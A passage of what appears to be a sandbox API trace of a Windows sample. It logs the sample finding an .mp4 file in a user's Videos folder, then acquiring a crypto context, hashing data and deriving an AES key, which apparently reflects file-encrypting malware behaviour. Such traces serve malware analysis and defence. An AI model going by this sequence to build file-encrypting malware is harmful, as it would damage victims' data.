wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.851] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.851] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.851] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.852] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0xc55df7e0, ftLastWriteTime.dwHighDateTime=0x1d5c4cc, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0x7c2240 [0041.852] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.852] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.852] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.852] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.852] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.852] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.853] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.853] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.853] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.854] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.854] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.855] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.855] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.855] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.855] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.855] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.855] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.855] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.856] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.856] CryptHashData (hHash=0x7c2100, pbData=0x7c50e0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.857] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.857] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.860] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, 